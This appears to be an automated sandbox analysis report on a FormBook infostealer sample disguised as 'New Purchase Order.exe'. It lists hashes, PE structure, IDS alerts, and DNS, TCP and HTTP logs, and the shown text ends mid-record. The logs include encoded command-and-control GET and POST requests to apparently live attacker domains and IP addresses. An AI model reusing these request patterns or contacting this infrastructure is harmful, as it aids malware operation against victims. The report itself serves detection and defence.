                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:New Purchase Order.exe
                                                        File size:811'008 bytes
                                                        MD5:c4a4fd2e695f61cefcf6bacd76fd91e5
                                                        SHA1:1d9d9b3ab5151310db4a828d329e28b77536e28c
                                                        SHA256:750c0b5cd8ecc25f79e725e1184401806154c3d4880cfabdc3641040a21798d6
                                                        SHA512:0d1c200ff5da82dbd7a3d91289af5822799cceea0e6445ed1fd4c8ab3b0d27f1d9b93d48ab06509b6b26cc7bd2ddbd5cc88936eeb6035355b3f92a9045d87c28
                                                        SSDEEP:12288:j1IR4R52J+XtT8F24kL2sBe8CuZXJKIucVqHhPOqg1hiLJhqYQAQ72AIBglqJxYh:j1IeebGVXKHRYizqYQARBI
                                                        TLSH:7D05F19C3501F05FC903C5714EB1FDB4AA586DAF970792039ADB5EEFB82D8978D041A2
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v.Ng..............0......P.......+... ...@....@.. ....................................@................................

                                                        File Icon

                                                        Icon Hash:033424c4c199d839

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4c2bfe
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x674EA776 [Tue Dec 3 06:38:46 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc2bb00x4b.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x4ca8.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xc0c040xc0e005eb64391e3c16d1a9cf1fc957163cd99False0.9086917226992871data7.774994729207274IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xc40000x4ca80x4e000574891037e884a0bab8937a67ceb5c2False0.9410556891025641data7.76896575786762IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xca0000xc0x20039c5af404b7051ac451c0d46fad1b43cFalse0.041015625data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xc41300x46f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9932852661126094
                                                        RT_GROUP_ICON0xc882c0x14data1.05
                                                        RT_VERSION0xc88400x278data0.4699367088607595
                                                        RT_MANIFEST0xc8ab80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-12-03T14:16:54.314122+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949870161.97.142.14480TCP
                                                        2024-12-03T14:16:54.314122+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949870161.97.142.14480TCP
                                                        2024-12-03T14:17:12.093744+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949910107.155.56.3080TCP
                                                        2024-12-03T14:17:14.770065+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949917107.155.56.3080TCP
                                                        2024-12-03T14:17:17.437644+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.949923107.155.56.3080TCP
                                                        2024-12-03T14:17:20.238916+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.949930107.155.56.3080TCP
                                                        2024-12-03T14:17:20.238916+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.949930107.155.56.3080TCP
                                                        2024-12-03T14:17:27.781273+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94994854.179.173.6080TCP
                                                        2024-12-03T14:17:30.453326+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94995654.179.173.6080TCP
                                                        2024-12-03T14:17:33.191667+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.94996254.179.173.6080TCP
                                                        2024-12-03T14:17:35.999511+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.94996854.179.173.6080TCP
                                                        2024-12-03T14:17:35.999511+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.94996854.179.173.6080TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 3, 2024 14:16:52.892237902 CET4987080192.168.2.9161.97.142.144
                                                        Dec 3, 2024 14:16:53.012276888 CET8049870161.97.142.144192.168.2.9
                                                        Dec 3, 2024 14:16:53.012507915 CET4987080192.168.2.9161.97.142.144
                                                        Dec 3, 2024 14:16:53.021856070 CET4987080192.168.2.9161.97.142.144
                                                        Dec 3, 2024 14:16:53.141824961 CET8049870161.97.142.144192.168.2.9
                                                        Dec 3, 2024 14:16:54.313868046 CET8049870161.97.142.144192.168.2.9
                                                        Dec 3, 2024 14:16:54.313904047 CET8049870161.97.142.144192.168.2.9
                                                        Dec 3, 2024 14:16:54.313916922 CET8049870161.97.142.144192.168.2.9
                                                        Dec 3, 2024 14:16:54.313931942 CET8049870161.97.142.144192.168.2.9
                                                        Dec 3, 2024 14:16:54.314121962 CET4987080192.168.2.9161.97.142.144
                                                        Dec 3, 2024 14:16:54.319123983 CET4987080192.168.2.9161.97.142.144
                                                        Dec 3, 2024 14:16:54.440664053 CET8049870161.97.142.144192.168.2.9
                                                        Dec 3, 2024 14:17:10.455794096 CET4991080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:10.575973988 CET8049910107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:10.576073885 CET4991080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:10.592150927 CET4991080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:10.712119102 CET8049910107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:12.093744040 CET4991080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:12.207675934 CET8049910107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:12.207691908 CET8049910107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:12.207782030 CET4991080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:12.207782030 CET4991080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:12.213809013 CET8049910107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:12.213864088 CET4991080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:13.112258911 CET4991780192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:13.235306978 CET8049917107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:13.235449076 CET4991780192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:13.249386072 CET4991780192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:13.373308897 CET8049917107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:14.770065069 CET4991780192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:14.861565113 CET8049917107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:14.861619949 CET8049917107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:14.861638069 CET4991780192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:14.861677885 CET4991780192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:14.890100002 CET8049917107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:14.890153885 CET4991780192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:15.784760952 CET4992380192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:15.904710054 CET8049923107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:15.908658981 CET4992380192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:15.922588110 CET4992380192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:16.042876959 CET8049923107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:16.043056011 CET8049923107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:17.437644005 CET4992380192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:17.521039963 CET8049923107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:17.521145105 CET4992380192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:17.521174908 CET8049923107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:17.521250963 CET4992380192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:17.557694912 CET8049923107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:17.557786942 CET4992380192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:18.456089020 CET4993080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:18.576150894 CET8049930107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:18.576328993 CET4993080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:18.585093021 CET4993080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:18.705058098 CET8049930107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:20.238722086 CET8049930107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:20.238740921 CET8049930107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:20.238748074 CET8049930107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:20.238873959 CET8049930107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:20.238879919 CET8049930107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:20.238887072 CET8049930107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:20.238915920 CET4993080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:20.238961935 CET4993080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:20.239329100 CET8049930107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:20.239335060 CET8049930107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:20.239341021 CET8049930107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:20.239351034 CET8049930107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:20.239376068 CET4993080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:20.239392996 CET4993080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:20.247828960 CET4993080192.168.2.9107.155.56.30
                                                        Dec 3, 2024 14:17:20.368004084 CET8049930107.155.56.30192.168.2.9
                                                        Dec 3, 2024 14:17:26.136224031 CET4994880192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:26.256366014 CET804994854.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:26.256510973 CET4994880192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:26.270303965 CET4994880192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:26.390244961 CET804994854.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:27.781272888 CET4994880192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:27.901782036 CET804994854.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:27.901864052 CET4994880192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:28.799962997 CET4995680192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:28.920017958 CET804995654.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:28.920193911 CET4995680192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:28.938545942 CET4995680192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:29.058623075 CET804995654.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:30.453325987 CET4995680192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:30.561443090 CET804995654.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:30.561563015 CET804995654.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:30.561577082 CET4995680192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:30.561619043 CET4995680192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:30.573719978 CET804995654.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:30.573815107 CET4995680192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:31.471926928 CET4996280192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:31.593275070 CET804996254.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:31.593355894 CET4996280192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:31.707395077 CET4996280192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:31.827770948 CET804996254.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:31.827882051 CET804996254.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:33.191500902 CET804996254.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:33.191592932 CET804996254.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:33.191667080 CET4996280192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:33.218856096 CET4996280192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:34.237720966 CET4996880192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:34.357773066 CET804996854.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:34.357867956 CET4996880192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:34.443656921 CET4996880192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:34.563705921 CET804996854.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:35.999140978 CET804996854.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:35.999320030 CET804996854.179.173.60192.168.2.9
                                                        Dec 3, 2024 14:17:35.999511003 CET4996880192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:36.002341986 CET4996880192.168.2.954.179.173.60
                                                        Dec 3, 2024 14:17:36.122438908 CET804996854.179.173.60192.168.2.9

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 3, 2024 14:16:52.356800079 CET5212153192.168.2.91.1.1.1
                                                        Dec 3, 2024 14:16:52.886044025 CET53521211.1.1.1192.168.2.9
                                                        Dec 3, 2024 14:17:09.365068913 CET6066653192.168.2.91.1.1.1
                                                        Dec 3, 2024 14:17:10.359600067 CET6066653192.168.2.91.1.1.1
                                                        Dec 3, 2024 14:17:10.452529907 CET53606661.1.1.1192.168.2.9
                                                        Dec 3, 2024 14:17:10.591386080 CET53606661.1.1.1192.168.2.9
                                                        Dec 3, 2024 14:17:25.253561974 CET6369253192.168.2.91.1.1.1
                                                        Dec 3, 2024 14:17:26.132348061 CET53636921.1.1.1192.168.2.9
                                                        Dec 3, 2024 14:17:41.019948959 CET5577453192.168.2.91.1.1.1
                                                        Dec 3, 2024 14:17:41.238794088 CET53557741.1.1.1192.168.2.9

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 3, 2024 14:16:52.356800079 CET192.168.2.91.1.1.10xee1bStandard query (0)www.070001325.xyzA (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:17:09.365068913 CET192.168.2.91.1.1.10x82f3Standard query (0)www.expancz.topA (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:17:10.359600067 CET192.168.2.91.1.1.10x82f3Standard query (0)www.expancz.topA (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:17:25.253561974 CET192.168.2.91.1.1.10xaccStandard query (0)www.taxiquynhonnew.clickA (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:17:41.019948959 CET192.168.2.91.1.1.10x712Standard query (0)www.epitomize.shopA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 3, 2024 14:15:37.301800966 CET1.1.1.1192.168.2.90x60c0No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Dec 3, 2024 14:15:37.301800966 CET1.1.1.1192.168.2.90x60c0No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:15:37.301887035 CET1.1.1.1192.168.2.90x60c0No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Dec 3, 2024 14:15:37.301887035 CET1.1.1.1192.168.2.90x60c0No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:16:52.886044025 CET1.1.1.1192.168.2.90xee1bNo error (0)www.070001325.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:17:10.452529907 CET1.1.1.1192.168.2.90x82f3No error (0)www.expancz.top107.155.56.30A (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:17:10.591386080 CET1.1.1.1192.168.2.90x82f3No error (0)www.expancz.top107.155.56.30A (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:17:26.132348061 CET1.1.1.1192.168.2.90xaccNo error (0)www.taxiquynhonnew.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                        Dec 3, 2024 14:17:26.132348061 CET1.1.1.1192.168.2.90xaccNo error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:17:26.132348061 CET1.1.1.1192.168.2.90xaccNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:17:26.132348061 CET1.1.1.1192.168.2.90xaccNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:17:41.238794088 CET1.1.1.1192.168.2.90x712Name error (3)www.epitomize.shopnonenoneA (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • www.070001325.xyz
                                                        • www.expancz.top
                                                        • www.taxiquynhonnew.click

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.949870161.97.142.144805828C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:16:53.021856070 CET535OUTGET /gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.070001325.xyz
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Dec 3, 2024 14:16:54.313868046 CET1236INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Tue, 03 Dec 2024 13:16:54 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 2966
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        ETag: "66cce1df-b96"
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                        Dec 3, 2024 14:16:54.313904047 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                        Dec 3, 2024 14:16:54.313916922 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                        Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.949910107.155.56.30805828C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:17:10.592150927 CET796OUTPOST /2gcl/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.expancz.top
                                                        Origin: http://www.expancz.top
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 194
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.expancz.top/2gcl/
